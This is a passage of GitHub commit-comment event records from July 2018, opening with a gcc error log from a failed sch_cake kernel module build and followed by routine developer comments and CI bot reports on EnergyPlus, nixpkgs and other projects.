^~~~~~~~~~~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2554:7: error: ‘CAKE_DIFFSERV_DIFFSERV8’ undeclared (first use in this function)\r\n  case CAKE_DIFFSERV_DIFFSERV8:\r\n       ^~~~~~~~~~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2558:7: error: ‘CAKE_DIFFSERV_DIFFSERV4’ undeclared (first use in this function)\r\n  case CAKE_DIFFSERV_DIFFSERV4:\r\n       ^~~~~~~~~~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2562:7: error: ‘CAKE_DIFFSERV_DIFFSERV3’ undeclared (first use in this function)\r\n  case CAKE_DIFFSERV_DIFFSERV3:\r\n       ^~~~~~~~~~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c: In function ‘cake_change’:\r\n/home/routeruser/sch_cake/sch_cake.c:2602:17: warning: unused variable ‘tb’ [-Wunused-variable]\r\n  struct nlattr *tb[TCA_CAKE_MAX + 1];\r\n                 ^~\r\n/home/routeruser/sch_cake/sch_cake.c: In function ‘cake_init’:\r\n/home/routeruser/sch_cake/sch_cake.c:2747:16: error: ‘CAKE_DIFFSERV_DIFFSERV3’ undeclared (first use in this function)\r\n  q->tin_mode = CAKE_DIFFSERV_DIFFSERV3;\r\n                ^~~~~~~~~~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2748:18: error: ‘CAKE_FLOW_TRIPLE’ undeclared (first use in this function); did you mean ‘CAKE_FLOW_MASK’?\r\n  q->flow_mode  = CAKE_FLOW_TRIPLE;\r\n                  ^~~~~~~~~~~~~~~~\r\n                  CAKE_FLOW_MASK\r\n/home/routeruser/sch_cake/sch_cake.c: In function ‘cake_dump’:\r\n/home/routeruser/sch_cake/sch_cake.c:2837:10: error: ‘TCA_CAKE_PAD’ undeclared (first use in this function); did you mean ‘TCA_ACT_PAD’?\r\n          TCA_CAKE_PAD))\r\n          ^~~~~~~~~~~~\r\n          TCA_ACT_PAD\r\n/home/routeruser/sch_cake/sch_cake.c:2888:23: error: ‘TCA_CAKE_SPLIT_GSO’ undeclared (first use in this function); did you mean ‘CAKE_FLAG_SPLIT_GSO’?\r\n  if (nla_put_u32(skb, TCA_CAKE_SPLIT_GSO,\r\n                       ^~~~~~~~~~~~~~~~~~\r\n                       CAKE_FLAG_SPLIT_GSO\r\n/home/routeruser/sch_cake/sch_cake.c: In function ‘cake_dump_stats’:\r\n/home/routeruser/sch_cake/sch_cake.c:2913:33: error: ‘TCA_CAKE_STATS_CAPACITY_ESTIMATE64’ undeclared (first use in this function); did you mean ‘TCA_STATS_RATE_EST64’?\r\n   if (nla_put_u64_64bit(d->skb, TCA_CAKE_STATS_ ## attr, \\\r\n                                 ^~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2918:2: note: in expansion of macro ‘PUT_STAT_U64’\r\n  PUT_STAT_U64(CAPACITY_ESTIMATE64, q->avg_peak_bandwidth);\r\n  ^~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2914:12: error: ‘TCA_CAKE_STATS_PAD’ undeclared (first use in this function); did you mean ‘TCA_STATS_PAD’?\r\n      data, TCA_CAKE_STATS_PAD)) \\\r\n            ^~~~~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2918:2: note: in expansion of macro ‘PUT_STAT_U64’\r\n  PUT_STAT_U64(CAPACITY_ESTIMATE64, q->avg_peak_bandwidth);\r\n  ^~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2909:27: error: ‘TCA_CAKE_STATS_MEMORY_LIMIT’ undeclared (first use in this function); did you mean ‘TCA_FQ_CODEL_MEMORY_LIMIT’?\r\n   if (nla_put_u32(d->skb, TCA_CAKE_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2919:2: note: in expansion of macro ‘PUT_STAT_U32’\r\n  PUT_STAT_U32(MEMORY_LIMIT, q->buffer_limit);\r\n  ^~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2909:27: error: ‘TCA_CAKE_STATS_MEMORY_USED’ undeclared (first use in this function); did you mean ‘TCP_RACK_STATIC_REO_WND’?\r\n   if (nla_put_u32(d->skb, TCA_CAKE_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2920:2: note: in expansion of macro ‘PUT_STAT_U32’\r\n  PUT_STAT_U32(MEMORY_USED, q->buffer_max_used);\r\n  ^~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2909:27: error: ‘TCA_CAKE_STATS_AVG_NETOFF’ undeclared (first use in this function)\r\n   if (nla_put_u32(d->skb, TCA_CAKE_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2921:2: note: in expansion of macro ‘PUT_STAT_U32’\r\n  PUT_STAT_U32(AVG_NETOFF, ((q->avg_netoff + 0x8000) >> 16));\r\n  ^~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2909:27: error: ‘TCA_CAKE_STATS_MAX_NETLEN’ undeclared (first use in this function); did you mean ‘TCA_STATS_MAX’?\r\n   if (nla_put_u32(d->skb, TCA_CAKE_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2922:2: note: in expansion of macro ‘PUT_STAT_U32’\r\n  PUT_STAT_U32(MAX_NETLEN, q->max_netlen);\r\n  ^~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2909:27: error: ‘TCA_CAKE_STATS_MAX_ADJLEN’ undeclared (first use in this function); did you mean ‘TCF_CBQ_LSS_MAXIDLE’?\r\n   if (nla_put_u32(d->skb, TCA_CAKE_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2923:2: note: in expansion of macro ‘PUT_STAT_U32’\r\n  PUT_STAT_U32(MAX_ADJLEN, q->max_adjlen);\r\n  ^~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2909:27: error: ‘TCA_CAKE_STATS_MIN_NETLEN’ undeclared (first use in this function)\r\n   if (nla_put_u32(d->skb, TCA_CAKE_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2924:2: note: in expansion of macro ‘PUT_STAT_U32’\r\n  PUT_STAT_U32(MIN_NETLEN, q->min_netlen);\r\n  ^~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2909:27: error: ‘TCA_CAKE_STATS_MIN_ADJLEN’ undeclared (first use in this function); did you mean ‘TCF_CBQ_LSS_MINIDLE’?\r\n   if (nla_put_u32(d->skb, TCA_CAKE_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2925:2: note: in expansion of macro ‘PUT_STAT_U32’\r\n  PUT_STAT_U32(MIN_ADJLEN, q->min_adjlen);\r\n  ^~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2930:34: error: ‘TCA_CAKE_STATS_TIN_STATS’ undeclared (first use in this function); did you mean ‘TASKSTATS_TYPE_STATS’?\r\n  tstats = nla_nest_start(d->skb, TCA_CAKE_STATS_TIN_STATS);\r\n                                  ^~~~~~~~~~~~~~~~~~~~~~~~\r\n                                  TASKSTATS_TYPE_STATS\r\n/home/routeruser/sch_cake/sch_cake.c:2939:33: error: ‘TCA_CAKE_TIN_STATS_THRESHOLD_RATE64’ undeclared (first use in this function); did you mean ‘TCA_FQ_LOW_RATE_THRESHOLD’?\r\n   if (nla_put_u64_64bit(d->skb, TCA_CAKE_TIN_STATS_ ## attr, \\\r\n                                 ^~~~~~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2951:3: note: in expansion of macro ‘PUT_TSTAT_U64’\r\n   PUT_TSTAT_U64(THRESHOLD_RATE64, b->tin_rate_bps);\r\n   ^~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2940:12: error: ‘TCA_CAKE_TIN_STATS_PAD’ undeclared (first use in this function); did you mean ‘TCA_STATS_PAD’?\r\n      data, TCA_CAKE_TIN_STATS_PAD)) \\\r\n            ^~~~~~~~~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2951:3: note: in expansion of macro ‘PUT_TSTAT_U64’\r\n   PUT_TSTAT_U64(THRESHOLD_RATE64, b->tin_rate_bps);\r\n   ^~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2939:33: error: ‘TCA_CAKE_TIN_STATS_SENT_BYTES64’ undeclared (first use in this function)\r\n   if (nla_put_u64_64bit(d->skb, TCA_CAKE_TIN_STATS_ ## attr, \\\r\n                                 ^~~~~~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2952:3: note: in expansion of macro ‘PUT_TSTAT_U64’\r\n   PUT_TSTAT_U64(SENT_BYTES64, b->bytes);\r\n   ^~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2935:27: error: ‘TCA_CAKE_TIN_STATS_BACKLOG_BYTES’ undeclared (first use in this function)\r\n   if (nla_put_u32(d->skb, TCA_CAKE_TIN_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2953:3: note: in expansion of macro ‘PUT_TSTAT_U32’\r\n   PUT_TSTAT_U32(BACKLOG_BYTES, b->tin_backlog);\r\n   ^~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2935:27: error: ‘TCA_CAKE_TIN_STATS_TARGET_US’ undeclared (first use in this function)\r\n   if (nla_put_u32(d->skb, TCA_CAKE_TIN_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2955:3: note: in expansion of macro ‘PUT_TSTAT_U32’\r\n   PUT_TSTAT_U32(TARGET_US,\r\n   ^~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2935:27: error: ‘TCA_CAKE_TIN_STATS_INTERVAL_US’ undeclared (first use in this function); did you mean ‘TCA_CODEL_INTERVAL’?\r\n   if (nla_put_u32(d->skb, TCA_CAKE_TIN_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2957:3: note: in expansion of macro ‘PUT_TSTAT_U32’\r\n   PUT_TSTAT_U32(INTERVAL_US,\r\n   ^~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2935:27: error: ‘TCA_CAKE_TIN_STATS_SENT_PACKETS’ undeclared (first use in this function); did you mean ‘IFLA_VF_STATS_TX_PACKETS’?\r\n   if (nla_put_u32(d->skb, TCA_CAKE_TIN_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2960:3: note: in expansion of macro ‘PUT_TSTAT_U32’\r\n   PUT_TSTAT_U32(SENT_PACKETS, b->packets);\r\n   ^~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2935:27: error: ‘TCA_CAKE_TIN_STATS_DROPPED_PACKETS’ undeclared (first use in this function); did you mean ‘IFLA_VF_STATS_RX_PACKETS’?\r\n   if (nla_put_u32(d->skb, TCA_CAKE_TIN_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2961:3: note: in expansion of macro ‘PUT_TSTAT_U32’\r\n   PUT_TSTAT_U32(DROPPED_PACKETS, b->tin_dropped);\r\n   ^~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2935:27: error: ‘TCA_CAKE_TIN_STATS_ECN_MARKED_PACKETS’ undeclared (first use in this function)\r\n   if (nla_put_u32(d->skb, TCA_CAKE_TIN_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2962:3: note: in expansion of macro ‘PUT_TSTAT_U32’\r\n   PUT_TSTAT_U32(ECN_MARKED_PACKETS, b->tin_ecn_mark);\r\n   ^~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2935:27: error: ‘TCA_CAKE_TIN_STATS_ACKS_DROPPED_PACKETS’ undeclared (first use in this function)\r\n   if (nla_put_u32(d->skb, TCA_CAKE_TIN_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2963:3: note: in expansion of macro ‘PUT_TSTAT_U32’\r\n   PUT_TSTAT_U32(ACKS_DROPPED_PACKETS, b->ack_drops);\r\n   ^~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2935:27: error: ‘TCA_CAKE_TIN_STATS_PEAK_DELAY_US’ undeclared (first use in this function)\r\n   if (nla_put_u32(d->skb, TCA_CAKE_TIN_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2965:3: note: in expansion of macro ‘PUT_TSTAT_U32’\r\n   PUT_TSTAT_U32(PEAK_DELAY_US,\r\n   ^~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2935:27: error: ‘TCA_CAKE_TIN_STATS_AVG_DELAY_US’ undeclared (first use in this function)\r\n   if (nla_put_u32(d->skb, TCA_CAKE_TIN_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2967:3: note: in expansion of macro ‘PUT_TSTAT_U32’\r\n   PUT_TSTAT_U32(AVG_DELAY_US,\r\n   ^~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2935:27: error: ‘TCA_CAKE_TIN_STATS_BASE_DELAY_US’ undeclared (first use in this function)\r\n   if (nla_put_u32(d->skb, TCA_CAKE_TIN_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2969:3: note: in expansion of macro ‘PUT_TSTAT_U32’\r\n   PUT_TSTAT_U32(BASE_DELAY_US,\r\n   ^~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2935:27: error: ‘TCA_CAKE_TIN_STATS_WAY_INDIRECT_HITS’ undeclared (first use in this function)\r\n   if (nla_put_u32(d->skb, TCA_CAKE_TIN_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2972:3: note: in expansion of macro ‘PUT_TSTAT_U32’\r\n   PUT_TSTAT_U32(WAY_INDIRECT_HITS, b->way_hits);\r\n   ^~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2935:27: error: ‘TCA_CAKE_TIN_STATS_WAY_MISSES’ undeclared (first use in this function)\r\n   if (nla_put_u32(d->skb, TCA_CAKE_TIN_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2973:3: note: in expansion of macro ‘PUT_TSTAT_U32’\r\n   PUT_TSTAT_U32(WAY_MISSES, b->way_misses);\r\n   ^~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2935:27: error: ‘TCA_CAKE_TIN_STATS_WAY_COLLISIONS’ undeclared (first use in this function)\r\n   if (nla_put_u32(d->skb, TCA_CAKE_TIN_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2974:3: note: in expansion of macro ‘PUT_TSTAT_U32’\r\n   PUT_TSTAT_U32(WAY_COLLISIONS, b->way_collisions);\r\n   ^~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2935:27: error: ‘TCA_CAKE_TIN_STATS_SPARSE_FLOWS’ undeclared (first use in this function)\r\n   if (nla_put_u32(d->skb, TCA_CAKE_TIN_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2976:3: note: in expansion of macro ‘PUT_TSTAT_U32’\r\n   PUT_TSTAT_U32(SPARSE_FLOWS, b->sparse_flow_count +\r\n   ^~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2935:27: error: ‘TCA_CAKE_TIN_STATS_BULK_FLOWS’ undeclared (first use in this function)\r\n   if (nla_put_u32(d->skb, TCA_CAKE_TIN_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2978:3: note: in expansion of macro ‘PUT_TSTAT_U32’\r\n   PUT_TSTAT_U32(BULK_FLOWS, b->bulk_flow_count);\r\n   ^~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2935:27: error: ‘TCA_CAKE_TIN_STATS_UNRESPONSIVE_FLOWS’ undeclared (first use in this function)\r\n   if (nla_put_u32(d->skb, TCA_CAKE_TIN_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2979:3: note: in expansion of macro ‘PUT_TSTAT_U32’\r\n   PUT_TSTAT_U32(UNRESPONSIVE_FLOWS, b->unresponsive_flow_count);\r\n   ^~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2935:27: error: ‘TCA_CAKE_TIN_STATS_MAX_SKBLEN’ undeclared (first use in this function)\r\n   if (nla_put_u32(d->skb, TCA_CAKE_TIN_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2980:3: note: in expansion of macro ‘PUT_TSTAT_U32’\r\n   PUT_TSTAT_U32(MAX_SKBLEN, b->max_skblen);\r\n   ^~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2935:27: error: ‘TCA_CAKE_TIN_STATS_FLOW_QUANTUM’ undeclared (first use in this function); did you mean ‘TCA_FQ_INITIAL_QUANTUM’?\r\n   if (nla_put_u32(d->skb, TCA_CAKE_TIN_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:2982:3: note: in expansion of macro ‘PUT_TSTAT_U32’\r\n   PUT_TSTAT_U32(FLOW_QUANTUM, b->flow_quantum);\r\n   ^~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c: In function ‘cake_dump_class_stats’:\r\n/home/routeruser/sch_cake/sch_cake.c:3088:27: error: ‘TCA_CAKE_STATS_DEFICIT’ undeclared (first use in this function); did you mean ‘TCA_STATS_BASIC’?\r\n   if (nla_put_s32(d->skb, TCA_CAKE_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:3092:3: note: in expansion of macro ‘PUT_STAT_S32’\r\n   PUT_STAT_S32(DEFICIT, flow->deficit);\r\n   ^~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:3084:27: error: ‘TCA_CAKE_STATS_DROPPING’ undeclared (first use in this function); did you mean ‘CAKE_SET_DECAYING’?\r\n   if (nla_put_u32(d->skb, TCA_CAKE_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:3093:3: note: in expansion of macro ‘PUT_STAT_U32’\r\n   PUT_STAT_U32(DROPPING, flow->cvars.dropping);\r\n   ^~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:3084:27: error: ‘TCA_CAKE_STATS_COBALT_COUNT’ undeclared (first use in this function)\r\n   if (nla_put_u32(d->skb, TCA_CAKE_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:3094:3: note: in expansion of macro ‘PUT_STAT_U32’\r\n   PUT_STAT_U32(COBALT_COUNT, flow->cvars.count);\r\n   ^~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:3084:27: error: ‘TCA_CAKE_STATS_P_DROP’ undeclared (first use in this function); did you mean ‘TCA_STATS_PAD’?\r\n   if (nla_put_u32(d->skb, TCA_CAKE_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:3095:3: note: in expansion of macro ‘PUT_STAT_U32’\r\n   PUT_STAT_U32(P_DROP, flow->cvars.p_drop);\r\n   ^~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:3088:27: error: ‘TCA_CAKE_STATS_BLUE_TIMER_US’ undeclared (first use in this function)\r\n   if (nla_put_s32(d->skb, TCA_CAKE_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:3097:4: note: in expansion of macro ‘PUT_STAT_S32’\r\n    PUT_STAT_S32(BLUE_TIMER_US,\r\n    ^~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:3088:27: error: ‘TCA_CAKE_STATS_DROP_NEXT_US’ undeclared (first use in this function)\r\n   if (nla_put_s32(d->skb, TCA_CAKE_STATS_ ## attr, data)) \\\r\n                           ^~~~~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c:3103:4: note: in expansion of macro ‘PUT_STAT_S32’\r\n    PUT_STAT_S32(DROP_NEXT_US,\r\n    ^~~~~~~~~~~~\r\n/home/routeruser/sch_cake/sch_cake.c: In function ‘cake_dsrc’:\r\n/home/routeruser/sch_cake/sch_cake.c:685:1: warning: control reaches end of non-void function [-Wreturn-type]\r\n }\r\n ^\r\n/home/routeruser/sch_cake/sch_cake.c: In function ‘cake_ddst’:\r\n/home/routeruser/sch_cake/sch_cake.c:690:1: warning: control reaches end of non-void function [-Wreturn-type]\r\n }\r\n ^\r\nAt top level:\r\n/home/routeruser/sch_cake/sch_cake.c:2242:32: warning: ‘cake_policy’ defined but not used [-Wunused-variable]\r\n static const struct nla_policy cake_policy[TCA_CAKE_MAX + 1] = {\r\n                                ^~~~~~~~~~~\r\nmake[2]: *** [scripts/Makefile.build:319: /home/routeruser/sch_cake/sch_cake.o] Error 1\r\nmake[1]: *** [Makefile:1575: _module_/home/routeruser/sch_cake] Error 2\r\nmake[1]: Leaving directory '/usr/src/kernels/4.17.3-200.fc28.x86_64'\r\nmake: *** [Makefile:8: default] Error 2\r\n`"}},"created_at":"2018-07-15T03:07:38Z"}
{"id":"7966714473","type":"CommitCommentEvent","actor":{"login":"kiingjulz"},"repo":{"name":"survanetwork/Worlds"},"payload":{"comment":{"id":29711216,"position":4,"line":4,"path":"plugin.yml","commit_id":"5d797444606bb81db3942aae1f64186c1eb32cb1","created_at":"2018-07-15T03:07:45Z","updated_at":"2018-07-15T03:07:45Z","author_association":"NONE","body":"api 4.0.0 please"}},"created_at":"2018-07-15T03:07:45Z"}
{"id":"7966715551","type":"CommitCommentEvent","actor":{"login":"wangning-lingli"},"repo":{"name":"rs/SDWebImage"},"payload":{"comment":{"id":29711218,"position":null,"line":null,"path":null,"commit_id":"d2dc4cbbac3b141f9f74cadab293696593dfa680","created_at":"2018-07-15T03:09:06Z","updated_at":"2018-07-15T03:09:06Z","author_association":"NONE","body":"Hello rs,I review the code from 2010. \" // Can't use defaultManager another thread\" Can you tell me the reason of that。"}},"created_at":"2018-07-15T03:09:06Z"}
{"id":"7966718138","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29711223,"position":null,"line":null,"path":null,"commit_id":"d59ae2e7ba967b2484c8ca60822fabcd6c5ebadf","created_at":"2018-07-15T03:11:41Z","updated_at":"2018-07-15T03:11:41Z","author_association":"NONE","body":"#158531941-VerticalVenetianBlindCoefficients (Unknown) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2984 of 2984 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d59ae2e7ba967b2484c8ca60822fabcd6c5ebadf-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d59ae2e7ba967b2484c8ca60822fabcd6c5ebadf-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-15T03:11:41Z"}
{"id":"7966719002","type":"CommitCommentEvent","actor":{"login":"lukehutch"},"repo":{"name":"lukehutch/fast-classpath-scanner"},"payload":{"comment":{"id":29711224,"position":4,"line":49,"path":"src/main/java/io/github/lukehutch/fastclasspathscanner/utils/NestedJarHandler.java","commit_id":"4fe2edd37c99e2bba6a92ac3748dd220fb34728a","created_at":"2018-07-15T03:12:42Z","updated_at":"2018-07-15T03:12:42Z","author_association":"OWNER","body":"@johnou Good catch! I appreciate all your work spot-checking my checkins. You're right, and I missed this because I had to disable Travis builds for JDK 7 and JDK 8, because of this Moditect bug: https://github.com/moditect/moditect/issues/62\r\n\r\nI didn't know about Animal Sniffer enforcer rules, but I'll work on adding that now."}},"created_at":"2018-07-15T03:12:42Z"}
{"id":"7966720217","type":"CommitCommentEvent","actor":{"login":"soumenpatel1"},"repo":{"name":"soumenpatel1/react-state"},"payload":{"comment":{"id":29711226,"position":null,"line":null,"path":null,"commit_id":"343b059a4388cb961feb5c04352f17a8bf18268e","created_at":"2018-07-15T03:14:09Z","updated_at":"2018-07-15T03:14:09Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-15T03:14:09Z"}
{"id":"7966722555","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29711232,"position":null,"line":null,"path":null,"commit_id":"d59ae2e7ba967b2484c8ca60822fabcd6c5ebadf","created_at":"2018-07-15T03:16:28Z","updated_at":"2018-07-15T03:16:28Z","author_association":"NONE","body":"#158531941-VerticalVenetianBlindCoefficients (Unknown) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d59ae2e7ba967b2484c8ca60822fabcd6c5ebadf-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-15T03:16:28Z"}
{"id":"7966726255","type":"CommitCommentEvent","actor":{"login":"grahamc"},"repo":{"name":"matthewbauer/nixpkgs"},"payload":{"comment":{"id":29711235,"position":null,"line":null,"path":null,"commit_id":"3f164a1de6f53cc1bcaa5164c3f5452ede09d1f9","created_at":"2018-07-15T03:20:31Z","updated_at":"2018-07-15T03:20:31Z","author_association":"NONE","body":"Yikes. That is tricky. Unfortunately my use was forcing x86 64 Linux from a Mac, and visa versa.\n\nI think if the deprecation error gave reasonable directions for how to go about fixing the problem, it would be okay. Right now there is no way to go from failed evaluation to how to move on with my day. \n\n> On Jul 14, 2018, at 10:41 PM, Matthew Bauer <notifications@github.com> wrote:\n> \n> aliases: add forceSystem alias for i686-linux\n> \n> forceSystem was used in various places outside of Nixpkgs. Doing it in\n> a generic way gets difficult due to how the system is parsed. Instead,\n> we just provide a value for (forceSystem \"i686-linux\" \"i386\"). Other\n> uses of forceSystem throw an error.\n> \n> /cc @grahamc @ericson2314\n> \n> -- \n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/matthewbauer/nixpkgs/commit/3f164a1de6f53cc1bcaa5164c3f5452ede09d1f9\n"}},"created_at":"2018-07-15T03:20:31Z"}
{"id":"7966733532","type":"CommitCommentEvent","actor":{"login":"chizhi204"},"repo":{"name":"chizhi204/Dian-task"},"payload":{"comment":{"id":29711256,"position":null,"line":null,"path":null,"commit_id":"d4387fb2c9a9ee22166fcfcdbae91dfb8155cfd1","created_at":"2018-07-15T03:29:07Z","updated_at":"2018-07-15T03:29:07Z","author_association":"OWNER","body":"The program of task1"}},"created_at":"2018-07-15T03:29:07Z"}
{"id":"7966737710","type":"CommitCommentEvent","actor":{"login":"grahamc"},"repo":{"name":"matthewbauer/nixpkgs"},"payload":{"comment":{"id":29711261,"position":null,"line":null,"path":null,"commit_id":"3f164a1de6f53cc1bcaa5164c3f5452ede09d1f9","created_at":"2018-07-15T03:33:43Z","updated_at":"2018-07-15T03:33:43Z","author_association":"NONE","body":"I guess the long and short of it is deleting force system has broken things I depend on. That’s a bit annoying but fine. What is really like to see is docs on how to get it working again under the new system. I don’t  need to specifically use force system, but id like a notice of “hey this is gone now, read docs XYZ for how to make it work again.”\n\nAlso note I believe I also use this for x86 -> aarch64 so I’m sort of your worst nightmare case 🙃\n\n> On Jul 14, 2018, at 11:20 PM, Graham Christensen <notifications@github.com> wrote:\n> \n> Yikes. That is tricky. Unfortunately my use was forcing x86 64 Linux from a Mac, and visa versa.\n> \n> I think if the deprecation error gave reasonable directions for how to go about fixing the problem, it would be okay. Right now there is no way to go from failed evaluation to how to move on with my day. \n> \n> > On Jul 14, 2018, at 